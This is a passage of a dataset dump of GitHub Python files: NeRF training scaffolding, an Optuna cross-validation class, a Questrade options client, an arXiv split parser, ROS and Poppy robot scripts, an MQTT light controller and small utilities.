*2))","repo_name":"munalshah13/Python_Exercises","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27159333729","text":"import argparse\nimport os\nimport sys\nimport time\n\nimport tqdm\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\n\nsys.path.append(os.pardir)\nfrom ioutil import JsonIO\nfrom model import makeModel, makeLossFunction, makeOptimizer, makeScheduer\nfrom dataset import makeTrainLoader\nfrom option.nerf_opt import parseArgument\n\ndef makeConfig(args: argparse.Namespace) -> dict:\n assert os.path.exists(args.config), \"Can not find configuration file with path {}\".format(args.config)\n config = JsonIO.input(args.config)\n return config\n\ndef main(\n config: dict,\n train_loader: DataLoader,\n model: nn.Module,\n optimizer: torch.optim.Optimizer,\n loss_fn,\n swriter: SummaryWriter,\n resumed_epoch: int\n):\n #* constant\n \n for epoch in tqdm.tqdm(dynamic_ncols=True):\n epoch_start_time = time.time()\n\n model.train()\n #* batch training\n batch_loss, batch_vis, batch_time = [], [], []\n for batch_idx, batch in enumerate(train_loader):\n batch_start_time = time.time()\n\n # TODO: here\n\n batch_time.append(time.time() - batch_start_time)\n batch_loss.append(loss.item())\n\nif __name__ == \"__main__\":\n args = parseArgument()\n\n #* set pytorch gpu id and settings\n torch.cuda.set_device(args.gpu)\n torch.set_default_dtype(torch.float32)\n torch.autograd.set_detect_anomaly(True)\n\n #* loading configuration file\n config = makeConfig(args)\n\n #* create ray dataset\n config.set(\"dataset\", \"clean_ray\", args.clean_ray)\n\n #* logger and tensorboard writer\n output_dir = config.get(\"output\", \"output_dir\")\n swriter = SummaryWriter(log_dir=output_dir, max_queue=1)\n\n #* create model, optimizer, loss function, scheduler and data loader\n # TODO: from here\n model = makeModel(config)\n loss_fn = makeLossFunction(config)\n optimizer = makeOptimizer(config, model)\n train_loader = makeTrainLoader(config)\n val_loader = makeValLoader(config)\n scheduler = makeScheduer(config)\n\n #* load model from checkpoint\n # TODO: from here\n if args.resume == 0:\n # specify the number of iteration\n resumed_epoch = 0\n elif args.resume == -1:\n # find the maximum number of iterations that is saved\n resumed_epoch = -1\n else:\n resumed_epoch = args.resume\n ckpt_path = os.path.join(output_dir, \"checkpoint_{}.pt\".format(resumed_epoch))\n \n # resume from checkpoint\n if resumed_epoch != 0:\n assert os.path.exists(ckpt_path), \"Can not find the required checkpoint file: {}.\".format(ckpt_path)\n logger.info(\"Loading checkpoint from {}, start from {} epoch.\".format(ckpt_path, resumed_epoch))\n\n ckpt = torch.load(ckpt_path, map_location='cuda:{}'.format(args.gpu))\n model.load_state_dict(ckpt[\"model\"])\n optimizer.load_state_dict(ckpt[\"optimizer\"])\n scheduler.load_state_dict(ckpt[\"scheduler\"])\n else:\n logger.info(\"Training from scratch.\")\n\n main(\n config, model, \n )\n\n","repo_name":"ZhaoOfficial/CG","sub_path":"Neural Radiance Field/main/nerf.py","file_name":"nerf.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70388385154","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom functools import partial\nimport joblib\nfrom typing import Callable, Dict, Optional\n\nimport numpy as np\nimport optuna\nfrom optuna import Trial\nfrom optuna.pruners import MedianPruner\nfrom optuna.samplers import TPESampler\nimport pandas as pd\nfrom sklearn.utils.validation import check_is_fitted\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom fforma.experiments.base.common import BaseData\nfrom fforma.utils.evaluation import evaluate_panel\n\n\nclass CrossValidation:\n\n def __init__(self, meta_learner, params: Callable, default_params: Optional[Dict] = {},\n metric = Callable,\n n_splits: int = 5, n_trials: int = 100,\n random_seed: int = 1,\n save_study_path: Optional[str] = None) -> 'CrossValidation':\n self.meta_learner = meta_learner\n self.meta_learner_name = meta_learner.__name__.replace('MetaLearner', '')\n self.params = params\n self.default_params = default_params\n self.metric = metric\n self.metric_name = metric.__name__\n self.n_splits = n_splits\n self.n_trials = n_trials\n self.random_seed = random_seed\n self.save_study_path = save_study_path\n\n self.study = None\n\n def _fit_meta_learner(self, data: BaseData, params_trial: Dict):\n if self.meta_learner_name == 'FFNN':\n params = {**params_trial, **self.default_params}\n model = self.meta_learner(params).fit(data.features,\n data.forecasts,\n data.ground_truth)\n elif self.meta_learner_name == 'XGBoost':\n params = {}\n params['xgb_params'] = params_trial\n params['n_estimators'] = params['xgb_params']['n_estimators']\n params = {**params, **self.default_params}\n model = self.meta_learner(**params).fit(data.features,\n data.get_metric(self.metric_name))\n else:\n raise Exception(f'Unknown meta learner: {model}')\n\n return model\n\n def _objective(self, trial: Trial, data: BaseData) -> float:\n\n # Data\n classes = data.features['unique_id'].str[0].values\n uids = data.features['unique_id'].values\n\n #kfold\n kf = StratifiedKFold(n_splits=self.n_splits,\n shuffle=True,\n random_state=self.random_seed)\n\n params_trial = self.params(trial)\n\n losses = []\n for step, (idx_train, idx_test) in enumerate(kf.split(uids, classes)):\n train_data = data.get_ids(uids[idx_train])\n test_data = data.get_ids(uids[idx_test])\n\n # Fit the model\n model = self._fit_meta_learner(train_data, params_trial)\n\n forecast = model.predict(test_data.features, test_data.forecasts)\n\n loss_test = evaluate_panel(test_data.ground_truth, forecast, self.metric)\n intermediate_value = loss_test.mean().values.item()\n losses.append(intermediate_value)\n\n #Pruning\n mean_intermediate_value = np.mean(losses)\n trial.report(mean_intermediate_value, step)\n\n # Handle pruning based on the intermediate value.\n if trial.should_prune():\n raise optuna.TrialPruned()\n\n losses = np.array(losses)\n mean_loss = losses.mean()\n std_loss = losses.std()\n\n return mean_loss\n\n def fit(self, data: BaseData) -> 'CrossValidation':\n\n objective = partial(self._objective, data=data)\n\n sampler = TPESampler(seed=self.random_seed)\n pruner = MedianPruner()\n study = optuna.create_study(sampler=sampler, pruner=pruner)\n study.optimize(objective, n_trials=self.n_trials, gc_after_trial=True)\n\n best_params = self.params(study.best_trial)\n\n self.study = study\n if self.save_study_path is not None:\n joblib.dump(study, self.save_study_path)\n\n self.model_ = self._fit_meta_learner(data, best_params)\n\n return self\n\n def predict(self, data: BaseData) -> pd.DataFrame:\n check_is_fitted(self, 'model_')\n\n forecast = self.model_.predict(data.features, data.forecasts)\n\n return forecast\n","repo_name":"FedericoGarza/fforma","sub_path":"fforma/experiments/cross_validation/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"42227430540","text":"import math\r\n#Konstanten#\r\nc = (2.997925E+8)\r\nh = (6.6262E-34)\r\ne = (1.6022E-19)\r\nE = (8.8542E-12)\r\npi = (math.pi)\r\nme = (9.1095E-31)\r\n#Konstanten#\r\n\r\n\r\nn=float(input(\"anzahl n=\")) # eingabe n _ normal immer 1\r\n\r\nm=float(input(\"anzahl m=\")) # eingabe m _ ab 2\r\n\r\n\r\nDeltaE = float(f\"{(e**4 * me)/(8 * E**2 * h**2)*(1/n**2 - 1/m**2)}\") # Die ganze formel\r\n\r\nDeltaEe =DeltaE/e # für das e in eV\r\nprint(DeltaEe,\"eV\")\r\n\r\nLogOut = input(\"Exit: Klick Enter\")\r\n","repo_name":"Deaf-Wolf/AbiPhysics","sub_path":"∆E Rechner.py","file_name":"∆E Rechner.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1562334698","text":"import config\nfrom datetime import datetime\nimport json\nimport math\nimport os\nimport random\nimport time\nfrom questrade_api import Questrade\n\n'''\nTODO:\n- convert _company_check() to decorator\n'''\n\nQUESTRADE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f%z'\n\nclass QuestradeTickerOptions(Questrade):\n\n def __init__(self, refresh_token = None, auto_refresh = True):\n if auto_refresh:\n if refresh_token is not None:\n raise Exception(\n ('Provide a refresh token OR request an auto-refresh from '\n 'stored config, NOT both.'))\n with open(os.path.expanduser('~/.questrade.json'), 'r') as QF:\n refresh_token = json.load(QF)['refresh_token']\n if refresh_token is None:\n raise Exception(\n ('Either a valid refresh token or a request for auto-refresh '\n 'are required'))\n\n super().__init__(refresh_token=refresh_token)\n self.__company_meta = None\n\n def _overload_robust_request(self, fn, *args, **kwargs):\n '''\n There are times when we might overload the server with requests,\n probably when there are multiple thread running). To combat this, make\n requests robust to server overload\n '''\n result = None\n\n while True:\n result = fn(*args, **kwargs)\n try:\n if result['code'] == 1006:\n # Yup, that's some overload\n time.sleep(random.random())\n continue\n except:\n # No 'code' key implies that we're good to go\n break\n\n return result\n\n def _parse_symbols(self, ticker):\n '''\n Basically a error-checking wrapper for symbols_search, since we still\n need to choose from the companies returned by the API\n '''\n company_meta = None\n\n companies = self._overload_robust_request(\n self.symbols_search, prefix=ticker.upper() )['symbols']\n for c in companies:\n if c['symbol'] == ticker:\n company_meta = c\n break\n\n if company_meta is None:\n raise Exception(\n 'No company exists with the exact ticker {}'.format(ticker))\n\n return company_meta\n\n def _company_check(self):\n if self.__company_meta is None:\n raise Exception(\n ('This operation requires a company to have been loaded via '\n 'load_company().'))\n\n def get_server_datetime(self):\n return datetime.strptime(self.time['time'], QUESTRADE_TIME_FORMAT)\n\n def get_timezone(self):\n return self.get_server_datetime().tzinfo\n\n def load_company(self, ticker):\n # There may be many different objects making requests simultaneously, so\n # we want to attempt to stagger them with ticker-dependent random waits\n random.seed(sum((ord(ch) for ch in ticker)) + time.time())\n self.__company_meta = self._parse_symbols(ticker)\n\n\n def get_security_price(self):\n self._company_check()\n\n response = self._overload_robust_request(\n self.markets_quote, self.__company_meta['symbolId'])\n\n for info in response['quotes']:\n if info['symbol'] == self.__company_meta['symbol']:\n current_info = info\n break\n\n if current_info is None:\n raise Exception(\n 'Could not find current quote for {}. Exiting.'.format(\n self.__company_meta['symbol']))\n\n return current_info['lastTradePrice']\n\n def get_options(self):\n '''\n return format:\n {\n :\n {\n : {\n 'type': ['C','P'],\n 'strike': ,\n ,\n },\n ...\n },\n ...\n }\n '''\n self._company_check()\n\n options = {}\n\n code = self.__company_meta['symbolId']\n\n # load up all the available options metadata\n options_meta = self._overload_robust_request(\n self.symbol_options, code)['optionChain']\n\n for ex in options_meta:\n new_ex = {}\n ex_date = ex['expiryDate']\n\n # Once we've found the data, we don't care about the minutiae of the\n # timezone and milliseconds\n dir_date = str(\n datetime.strptime(ex_date, QUESTRADE_TIME_FORMAT).date())\n\n # Gather up the series for this expiry.\n quotes = self._overload_robust_request(\n self.markets_options,\n filters=[{'underlyingId': code,'expiryDate': ex_date}]\n )['optionQuotes']\n\n # We reformulate as a dict keyed by the symbolId to make it easier\n # to load in the data in the inner compiling loop below\n series_data = {op['symbolId']: op for op in quotes}\n\n for s in ex['chainPerRoot'][0]['chainPerStrikePrice']:\n for op_type in ('call', 'put'):\n op_id = s[op_type + 'SymbolId']\n new_ex[op_id] = {\n 'type': op_type[0].upper(),\n 'strike': s['strikePrice'],\n 'data': series_data[op_id]\n }\n\n options[dir_date] = new_ex\n\n return options\n","repo_name":"cancub/options-model","sub_path":"questrade_options_api.py","file_name":"questrade_options_api.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15647911883","text":"from pathlib import Path\nfrom tqdm import tqdm\nimport json\n\nSRC_FILE = \"/home/suehyun/datasets/arxiv/arxiv-metadata-oai-snapshot.json\"\nTRAIN_DIR = \"/home/suehyun/datasets/arxiv-splits/time_stratified_train\"\nVALIDATION_DIR = \"/home/suehyun/datasets/arxiv-splits/time_stratified_validation\"\nTEST_DIR = \"/home/suehyun/datasets/arxiv-splits/test\"\nREF_DIR = \"/home/suehyun/workspace/model/emerging-new-words/splits/arxiv\"\n\ndef print_title(title: str):\n print(\"=\" * 80)\n print(title)\n print(\"=\" * 80)\n \ndef get_target_docs(split: str) -> dict():\n print_title(f\"Parse target docs for {split} split ...\")\n target_docs = dict()\n \n if split == \"test\":\n split_path = Path(REF_DIR, split)\n else:\n split_path = Path(REF_DIR, \"time_stratified_\" + split)\n with split_path.open('r') as f:\n while True:\n line = f.readline()\n if not line:\n break\n date, doc_id = line.strip().split('\\t')\n target_docs[doc_id] = date\n print(f\"Length of {split} target docs: {len(target_docs)}\\n\")\n return target_docs\n\ndef write_data(write_dir: Path, date: str, doc_id: str, abstract: str):\n doc_id = doc_id.replace('/', '=') # file names do not allow slashes, e.g., \"solv-int/9812025\"\n abstract = abstract.strip().replace('\\n', ' ')\n \n file_name = date + '_' + doc_id + \".txt\"\n write_path = write_dir / file_name\n with write_path.open('w') as f:\n f.write(abstract)\n write_path.chmod(0o444) # read-only\n\ndef parse_then_move_files(train_target: dict, validation_target: dict, test_target: dict):\n print_title(\"Start parsing json and move files ...\")\n src_file_path = Path(SRC_FILE)\n \n train_dir_path = Path(TRAIN_DIR)\n validation_dir_path = Path(VALIDATION_DIR)\n test_dir_path = Path(TEST_DIR)\n \n with open(src_file_path) as f:\n for line in tqdm(f):\n meta_data = json.loads(line)\n doc_id = meta_data[\"id\"]\n abstract = meta_data[\"abstract\"]\n \n if train_target.get(doc_id): # amortized O(1) time complexity\n write_data(train_dir_path, train_target.pop(doc_id), doc_id, abstract)\n elif validation_target.get(doc_id):\n write_data(validation_dir_path, validation_target.pop(doc_id), doc_id, abstract)\n elif test_target.get(doc_id):\n write_data(test_dir_path, test_target.pop(doc_id), doc_id, abstract)\n \n try:\n assert len(train_target) == 0\n except:\n print(\"Missing train docs\", sorted(list(train_target)))\n \n try:\n assert len(validation_target) == 0\n except:\n print(\"Missing validation docs\", sorted(list(validation_target)))\n \n try:\n assert len(test_target) == 0\n except:\n print(\"Missing test docs\", sorted(list(test_target)))\n\nif __name__ == \"__main__\":\n train_target = get_target_docs(\"train\")\n validation_target = get_target_docs(\"validation\")\n test_target = get_target_docs(\"test\")\n parse_then_move_files(train_target, validation_target, test_target)\n ","repo_name":"suehyunpark/emerging-new-words","sub_path":"src/arxiv/1-split.py","file_name":"1-split.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34934052369","text":"import fridge.Constituent.Constituent as Constituent\nimport fridge.utilities.mcnpCreatorFunctions as mcnpCF\n\n\nclass FuelBond(Constituent.Constituent):\n \"\"\"Creates the bond material between the fuel and the inner cladding.\"\"\"\n def __init__(self, unit_info):\n super().__init__(unit_info)\n self.radius = 0\n self.height = 0\n self.fuelSurfaceNum = 0\n self.get_material_card(unit_info[0][3])\n self.make_component(unit_info[1])\n\n def make_component(self, bond_info):\n self.radius = bond_info[0] / 2\n self.height = bond_info[1]\n self.fuelSurfaceNum = bond_info[2]\n surface_comment = \"$Pin: Bond - 1% higher than fuel\"\n cell_comment = \"$Pin: Bond\"\n self.surfaceCard = mcnpCF.build_right_circular_cylinder_surface(self.radius, self.height, self.position,\n self.surfaceNum, surface_comment)\n self.cellCard = mcnpCF.build_concentric_cell(self.cellNum, self.materialNum, self.material.atomDensity,\n self.fuelSurfaceNum, self.surfaceNum, self.universe, cell_comment)\n","repo_name":"ryanstwrt/FRIDGe","sub_path":"fridge/Constituent/FuelBond.py","file_name":"FuelBond.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12113660638","text":"import pygame\nimport random\n\nclass Brick:\n def __init__(self, pos, wh, code, toughscore = 1):\n self.col_w_h = wh\n half_x = wh[0]/2\n half_y = wh[1]/2\n self.pos = [pos[0] + 135, pos[1] + 120]\n self.top_point = (self.pos[0] + half_x, self.pos[1])\n self.bottom_point = (self.pos[0] + half_x, self.pos[1] + wh[1])\n self.right_point = (self.pos[0] + wh[0], self.pos[1] + half_y)\n self.left_point = (self.pos[0], self.pos[1] + half_y)\n self.rect = pygame.Rect(self.pos[0], self.pos[1], wh[0], wh[1])\n self.code = code\n self.powerup = None\n self.toughness = toughscore\n if random.randint(0, 100) == 100:\n ran = random.randint(0, 1)\n if ran == 0:\n self.powerup = \"Heavy\"\n elif ran == 1:\n self.powerup = \"Speed\"\n\n def get_rect(self):\n return self.rect","repo_name":"fahreradam/Pixel-Break","sub_path":"Pixel Break/bricks.py","file_name":"bricks.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18542182419","text":"from django.urls import path\nfrom .views import Home, FullVacante, MiPerfil, HomeFiltered, BorrarVacante\n\nurlpatterns = [\n path(\"\", Home.as_view(), name=\"home\"),\n path(\"vacante/\", FullVacante.as_view(), name=\"vacante\"),\n path(\"vacantes/\", HomeFiltered.as_view(), name=\"filter\"),\n path(\"perfil/\", MiPerfil.as_view(), name=\"perfil\"),\n path(\"delete//\", BorrarVacante, name=\"delete\")\n]","repo_name":"MVNdev/unijoblink","sub_path":"apps/vacantes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70847829314","text":"import rospy, cv2\nfrom sensor_msgs.msg import Image\nimport sys\n\nsys.path.append(\"~/catkin_workspace/install/lib/python3/dist-packages/\")\nimport cv_bridge\n\n\nclass Follower:\n def __init__(self):\n self.bridge = cv_bridge.CvBridge()\n # cv2.namedWindow(\"window\", 1)\n self.image_sub = rospy.Subscriber('/camera/zed/rgb/image_rect_color',\n Image, self.image_callback)\n self.num1 = 68\n self.num2 = 68\n\n def image_callback(self, msg):\n self.image = self.bridge.imgmsg_to_cv2(msg, desired_encoding='bgr8')\n cv2.imshow(\"pic\", self.image)\n k = cv2.waitKey(3)\n if k == 27: # 按ESC退出\n cv2.destroyAllWindows()\n\n elif k == ord('r'): # 按r保存并退出\n self.num1 += 1\n cv2.imwrite(\"./red/\" + str(self.num1) + \".jpg\", self.image)\n print(\"红色保存成功:\" + str(self.num1) + \".jpg\")\n\n elif k == ord('g'): # 按r保存并退出\n self.num2 += 1\n cv2.imwrite(\"./green/\" + str(self.num2) + \".jpg\", self.image)\n print(\"绿色保存成功:\" + str(self.num2) + \".jpg\")\n\n\nif __name__ == '__main__':\n rospy.init_node('follower')\n follower = Follower()\n rospy.spin()","repo_name":"xmy0916/paddleDetectLightInROS","sub_path":"src/prtSc.py","file_name":"prtSc.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37728792962","text":"from model import ClassifierModel, Data\nfrom imports import *\n\ndef view_classify(img, ps):\n \n classes = ['buildings', 'forest', 'glacier', 'mountain', 'sea', 'street']\n\n ps = ps.data.cpu().numpy().squeeze()\n img = img.numpy().transpose(1,2,0)\n \n fig, (ax1, ax2) = plt.subplots(figsize=(10,8), ncols=2)\n ax1.imshow(img)\n ax1.axis('off')\n ax2.barh(classes, ps)\n ax2.set_aspect(0.1)\n ax2.set_yticks(classes)\n ax2.set_yticklabels(classes)\n ax2.set_title('Class Probability')\n ax2.set_xlim(0, 1.1)\n\n plt.tight_layout()\n plt.savefig(\"output.jpg\")\n\n return None\n \nif __name__ == \"__main__\":\n \n \n DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n TRAIN_DIR = ENTER-TRAINING-DIRECTORY\n VAL_DIR = ENTER-VALIDATION-DIRECTORY\n \n model = ClassifierModel().to(DEVICE)\n model.load_state_dict(torch.load(\"/content/best-weights.pt\"))\n trainLoader, valLoader, trainset, validset = Data(train_dir=TRAIN_DIR, val_dir=VAL_DIR, batch_size=BATCH_SIZE).load()\n\n image, label = validset[np.random.randint(0, len(validset))]\n\n image = image.unsqueeze(0)\n logits = model(image.to(DEVICE))\n probs = nn.Softmax(dim=1)(logits)\n\n view_classify(image.squeeze(), probs)\n","repo_name":"niyarrbarman/transfer-learning-intel-clf","sub_path":"model/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23441016731","text":"t = int(input())\n\nfor i in range(1, t + 1):\n s = []\n N = int(input())\n\n for j in range(N):\n s.append(input())\n\n for j in range(N):\n temp = list(s[j])\n k = 0\n length = len(temp)\n while k < length - 1 :\n if(temp[k][0] == temp[k+1][0]):\n temp[k] = temp[k] + temp[k+1]\n temp.pop(k+1)\n length -= 1\n k -= 1\n k += 1\n s[j] = temp\n\n temp = s[0]\n indices = range(len(temp))\n max_steps = [0 for x in indices]\n min_steps = [100000 for x in indices]\n flag = True\n for j in s:\n if len(temp) == len(j):\n for k in indices:\n if j[k][0] != temp[k][0]:\n flag = False\n break\n max_steps[k] = max(len(j[k]), max_steps[k])\n min_steps[k] = min(len(j[k]), min_steps[k])\n else:\n flag = False\n break\n if flag:\n print(\"Case #\" + str(i) + \":\", sum(max_steps) - sum(min_steps))\n else:\n print(\"Case #\" + str(i) + \": Fegla Won\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_142/844.py","file_name":"844.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40066249567","text":"\"\"\"\n$ python run_walk_experiment.py \n sample < 0: use reference trajectory (pypot_traj1.pkl)\n 0 <= sample < 100: use perturbed trajectory (pypot_sample_trajectory_.pkl)\n 100 <= sample: use updated trajectory (pypot_traj_star.pkl)\nsaves output data as\n walk_samples/results_.pkl\n walk_samples/frames.pkl (overwrites previous run due to storage limitations)\n\"\"\"\nimport sys\nimport pickle as pk\nimport numpy as np\nimport poppy_wrapper as pw\ntry:\n from pypot.creatures import PoppyHumanoid as PH\n from pypot.sensor import OpenCVCamera\n import pypot.utils.pypot_time as time\nexcept:\n from mocks import PoppyHumanoid as PH\n from mocks import OpenCVCamera\n import time\n\n# for python 2.7 on poppy\nif hasattr(__builtins__, 'raw_input'):\n input=raw_input\n\n# [0, 3, 4, 5, 2, 6, 8, 9, 1, 7]\n# [8, 4, 0, 3, 6, 9, 5, 1, 7, 2]\n# [3, 8, 7, 5, 4,||| 1,||| 2, 6, 9, 0]\n\nsample = int(sys.argv[1])\n\nsave_images = True\nif save_images:\n poppy = pw.PoppyWrapper(PH(), OpenCVCamera(\"poppy-cam\", 0, 24))\n binsize = 5\nelse:\n poppy = pw.PoppyWrapper(PH())\n binsize = None\n \n# load planned trajectory\nif sample < 0:\n with open('pypot_traj1.pkl', \"rb\") as f: trajs = pk.load(f)\nelif sample >= 100:\n with open('pypot_traj_star.pkl', \"rb\") as f: trajs = pk.load(f)\nelse:\n with open('walk_samples/pypot_sample_trajectory_%d.pkl' % sample, \"rb\") as f: trajs = pk.load(f)\n\n# get initial angles\n_, init_angles = trajs[0][0]\n\n# PID tuning\nK_p, K_i, K_d = 20.0, 0.0, 0.0\nfor m in poppy.motors:\n if hasattr(m, 'pid'): m.pid = (K_p, K_i, K_d)\n\ninput('[Enter] to turn off compliance')\npoppy.comply(False)\n\ninput('[Enter] for init angles (may want to hold up by strap)')\n\npoppy.goto_position(init_angles, duration=1, bufsize=10, speed_ratio=-1) # don't abort for speed\n\ninput('[Enter] to begin walking')\n\nnum_cycles, stop_traj = 1, 5 # one step, return to init\nif np.abs(sample) >= 100:\n num_cycles = 10\n stop_traj = len(trajs)\n\nbufs = []\nvids = []\nsuccess = True\nfor cycle in range(num_cycles):\n for t, traj in enumerate(trajs[:stop_traj]):\n \n # settle briefly at waypoint\n # if t not in [3]: # don't wait before kick\n # time.sleep(0.1)\n if t not in [2]: # don't wait after swing\n traj = traj + ((0.1, traj[-1][1]),)\n \n bufs.append([])\n vids.append([])\n for s, (duration, angles) in enumerate(traj[1:]): # skip (0, start)\n buf = poppy.goto_position(angles, duration, bufsize=10, speed_ratio=-1, binsize=binsize)\n vid = buf[1].pop('images')\n bufs[-1].append(buf)\n vids[-1].append(vid)\n success = buf[0]\n print(' success = %s' % str(success))\n if not success: break\n if not success: break\n\n # wait at final pose for stability\n if success:\n print('settling into init...')\n # time.sleep(3)\n buf = poppy.goto_position(angles, duration=3, bufsize=10, speed_ratio=-1, binsize=binsize)\n vid = buf[1].pop('images')\n bufs[-1].append(buf)\n vids[-1].append(vid)\n success = buf[0]\n print(' success = %s' % str(success))\n if not success: break\n\n # check for next step\n if num_cycles > 1:\n cmd = input('[Enter] for next step, [q] to abort: ')\n if cmd == 'q': break\n\ninput('[Enter] to return to rest and go compliant (may want to hold up by strap)')\npoppy.goto_position({name: 0. for name in poppy.motor_names}, 3, bufsize=10, speed_ratio=-1)\npoppy.comply()\n\nprint(\"closing...\")\npoppy.close()\nprint(\"closed.\")\n\nwhile True:\n try:\n if num_cycles == 1:\n print(\"How far did Poppy get?\")\n print(\"0 - nowhere\")\n print(\"1 - to shift\")\n print(\"2 - to push\")\n print(\"3 - to kick\")\n print(\"4 - all the way\")\n result = int(input(\"Enter the result: \"))\n assert result in [0,1,2,3,4]\n break\n else:\n print(\"How many steps did Poppy get?\")\n result = int(input(\"Enter the result: \"))\n assert result in list(range(0, 2*num_cycles+1))\n break\n except:\n print(\"Invalid input.\")\n\nwith open('walk_samples/results_%d.pkl' % sample, \"wb\") as f:\n pk.dump((poppy.motor_names, result, bufs), f)\n\n# overwrite frame file every time due to limited storage space on chip\nwith open('walk_samples/frames.pkl', \"wb\") as f:\n pk.dump(vids, f)\n\n","repo_name":"garrettkatz/poppy-muffin","sub_path":"scripts/run_walk_experiment.py","file_name":"run_walk_experiment.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71113204354","text":"# This Python script uses the MQTT (Message Queuing Telemetry Transport) protocol to communicate between a motion sensor device and a light control system.\r\n# The script consists of two parts: one for the motion sensor device (motionDevice.py) and one for the light control system (lightControl.py).\r\n\r\n#This is the second part of the script (lightControl.py), which runs on the light control system.\r\n\r\n\r\n\r\n#Import libraries\r\nimport paho.mqtt.client as mqtt #for MQTT protocol\r\nimport json #to convert the python dictionary into a JSON string that can be written into a file\r\n\r\n# Set up the initial state of the light\r\nlight_state = \"off\"\r\n\r\n# Define the on_connect and on_message functions for the MQTT client\r\ndef on_connect(client, userdata, flags, rc):\r\n print(\"Connected to broker with result code \"+str(rc))\r\n\r\n # Subscribe to the \"motion_sensor\" and \"light_control\" topics\r\n client.subscribe(\"motion_sensor\")\r\n client.subscribe(\"light_control\")\r\n\r\ndef on_message(client, userdata, message):\r\n # Extract the topic and payload from the received message\r\n global light_state\r\n topic = message.topic\r\n payload = message.payload.decode()\r\n print(\"Received message: \"+payload+\" on topic: \"+topic)\r\n\r\n # If the message is from the motion sensor, check if motion was detected and turn on the light if it's currently off\r\n if topic == \"motion_sensor\":\r\n data = json.loads(payload)\r\n motion_detected = data[\"motion_detected\"]\r\n if motion_detected:\r\n print(\"Motion detected!\")\r\n if light_state == \"off\":\r\n client.publish(\"light_control\", \"on\")\r\n print(\"Turning on the light.\")\r\n light_state = \"on\"\r\n else:\r\n print(\"No motion detected.\")\r\n\r\n # If the message is a light control message, update the state of the light accordingly\r\n elif topic == \"light_control\":\r\n if payload == \"on\":\r\n print(\"Light turned on.\")\r\n light_state = \"on\"\r\n elif payload == \"off\":\r\n print(\"Light turned off.\")\r\n light_state = \"off\"\r\n\r\n# Create MQTT client instance\r\nclient = mqtt.Client()\r\n\r\n# Assign the on_connect and on_message functions to MQTT client instance\r\nclient.on_connect = on_connect\r\nclient.on_message = on_message # Set up callback function for message received event\r\n\r\n# Connect to the MQTT broker\r\nclient.connect(\"mqtt.eclipseprojects.io\") # a public test MQTT broker address/service \"https://mqtt.eclipseprojects.io/ \"\r\n\r\n\r\n# Subscribe to the motion detection topic and define callback\r\nclient.subscribe(\"home/light\")\r\n\r\n\r\n# Start the MQTT loop indefinately to listen and handle messages\r\nclient.loop_forever()\r\n\r\n\r\n\r\n\r\n# CODE SUMMARY:\r\n\r\n# It starts by importing the required libraries, including the Paho MQTT client library and JSON and defines the MQTT broker parameters,\r\n# sets up the initial state of the light, and defines the on_connect and on_message functions for the MQTT client.\r\n# The on_connect function is called when the client connects to the broker and subscribes to the \"motion_sensor\" and \"light_control\" topics.\r\n# The on_message function is called when the client receives a message, extracts the topic and payload from the received message,\r\n# and checks if the message is from the motion sensor or the light control system.\r\n# If the message is from the motion sensor, it checks if motion was detected and turns on the light if it's currently off.\r\n# If the message is a light control message, it updates the state of the light accordingly.\r\n# The script creates an MQTT client instance, assigns the on_connect and on_message functions to it, and connects to the MQTT broker.\r\n# The script then starts the MQTT loop indefinitely to listen and handle messages.","repo_name":"MUTEGIbeatrice/Group2-paho-mqtt","sub_path":"light/lightControl.py","file_name":"lightControl.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40051583752","text":"import os\nimport cv2\n\nimport numpy as np\n\ndef xyxy2xywh(bbox,image_shape):\n new_bbox = np.zeros_like(bbox)\n new_bbox[:, 2] = np.absolute(bbox[:, 0] - bbox[:, 2]) / image_shape[1]\n new_bbox[:, 3] = np.absolute(bbox[:, 1] - bbox[:, 3]) / image_shape[0]\n new_bbox[:, 0] = (bbox[:, 0] + bbox[:, 2]) / (2 * image_shape[1])\n new_bbox[:, 1] = (bbox[:, 1] + bbox[:, 3]) / (2 * image_shape[0])\n return 